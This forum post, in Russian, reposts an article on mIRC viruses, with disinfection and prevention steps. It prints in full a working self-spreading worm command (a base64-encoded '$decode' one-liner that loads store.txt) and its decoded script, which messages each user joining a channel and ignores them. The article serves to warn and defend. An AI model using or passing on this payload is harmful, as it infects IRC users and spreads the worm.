Когда люди впервые попадают в Irc или же просто плохо разбираются в Irc, они могут стать жертвой злоумышленнников, распространяющих вредоносные вирусы через mIrc (а как известно именно mIRC является самым популярным клиентом для подключения к Irc сетям). Всвязи с этим предлагаю вашему вниманию эту небольшую,но весьма интересную статью, взятую мной с сайта http://filona.tomsk.ru/mirc-viruses.html . Вирусы, распространяющиеся с помощью mIRC
Вступление
mIRC-вирусы стали довольно распространёнными благодаря большой популярности этого IRC-клиента. Нередко бывает, что неопытный пользователь заражается ими, даже не понимая, что произошло. В этой статье я делаю попытку рассмотреть наиболее распространённые вирусы и методы заражения ими в mIRC, а также принципы лечения и профилактики.
Итак, Вас вдруг выкинуло из "мирки" с причинами типа "(Virus/Trojan. Your IRC client is infected, please check it & stop infecting others.)))", "(You are banned, Ваш irc-клиент заражён вирусом, удалите его и установите новый.)", "(You are banned. Пожалуйста, избавьтесь от компьютерных вирусов.)", "(You are banned, Trojan runner. Check your system for viruses and reinstall your IRC client.)" или просто "(decode virus)". Все эти сообщения означают, что Вы (сознательно или нет) заразили свой mIRC вирусом. Чаще всего это происходит в результате ввода "странной" команды, которую Вас попросил ввести в привате знакомый (или незнакомый) человек либо открытия не менее странной ссылки, сопровождавшейся словами типа "Fotos XXX ...", "Aprende a conquistar al sexo opuesto ...", "Mira esta foto ..." и т. д. То есть вирус сулит вам порнографические картинки, а на самом деле просто таким путём размножается.
Иногда вирусы распространяются, рассылая свои копии по DCC. При этом у некоторых версий mIRC (и его клонов) присланные файлы располагались в каталоге самого клиента и могли замещать дефолтный файл script.ini, таким образом при следующем старте mIRC'а он оказывается зараженным. Несмотря на то, что именно эта "дыра" в настоящее время ликвидирована, вредоносные скрипты всё равно могут прописываться в автозагрузку клиента.
Наиболее распространённые вирусы и способы заражения ими
Простейшие скриптовые вирусы, не приносящие особого вреда
Один из самых старых и распространённых вирусов выглядит так: Вам в привате пишут что-нибудь вроде "Наши фотки. Не вирус! ..." или "Возможность #канал чтение приватов ..." и далее предлагается команда: //write store.txt $decode(b24gMTpqb2luOiM6IHsgLm1zZyAkbmljayDC7ufs7ubt7vHy/ CAjIPfy5e3o5SDv8Oji4PLu4iwg7eDk7iDv8O7v6PHg8vwgLy93cml0ZSBzdG9yZS50eHQgJCAkKyBkZ WNvZGUoICQrICRlbmNvZGUoICRyZWFkKCRzY3JpcHQsbiwxKSAsbSkgJCsgLG0pICRjaHIoMTI0KSAvL 3dyaXRlIHN0b3JlLnR4dCAkY2hyKDEyNCkgLmxvYWQgLXJzIHN0b3JlLnR4dCB8IC5pZ25vcmUgJG5pY 2sgfQ==,m) | //write store.txt | .load -rs store.txt
Если его расшифровать, то получается такой скрипт, который записывается в файл store.txt: on 1:join:#: { .msg $nick Возможность # чтение приватов, надо прописать //write store.txt $ $+ decode( $+ $encode( $read($script,n,1) ,m) $+ ,m) $chr(124) //write store.txt $chr(124) .load -rs store.txt | .ignore $nick }
То есть после заражения этим вирусом Ваш mIRC всем заходящим на канал отправляет в приват тот же текст, который получили Вы, с той же командой, после чего ставит игнор по нику (чтобы Вы не увидели возмущённых сообщений от этих пользователей, что Вы являетесь разносчиком вируса и как можно дольше могли распространять вирус).
Чтобы вылечиться Вам необходимо проделать следующее:
1)Выгрузить вирусный скрипт командой /unload -rs store.txt
2)Выключить и закрыть mIRC, открыть каталог, где mIRC установлен, найти файл "store.txt" и удалить его.
3)Запустить mIRC снова. Когда запустите, наберите alt+b и перейдите на вкладку Control, из выпадающего списка выберите Ignore и изучите внимательно список игнорирования. Если обнаружите там тех пользователей, на которых Вы игнор не ставили, удалите их из списка. Можно сделать быстрее — набрать команду /ignore -r — это очистит список игнорирования полностью. Тут стоит заметить, что файл с вирусом вовсе не обязательно может называться "store.txt", могут быть любые другие имена. Таким образом, не мешает заглянуть в лог того самого привата, команду из которого Вы некогда набрали, найти там название файла (проще всего глянуть, что стоит в самом конце после ".load -rs") и проделать вышеописанные действия, подставив вместо "store.txt" название того файла.
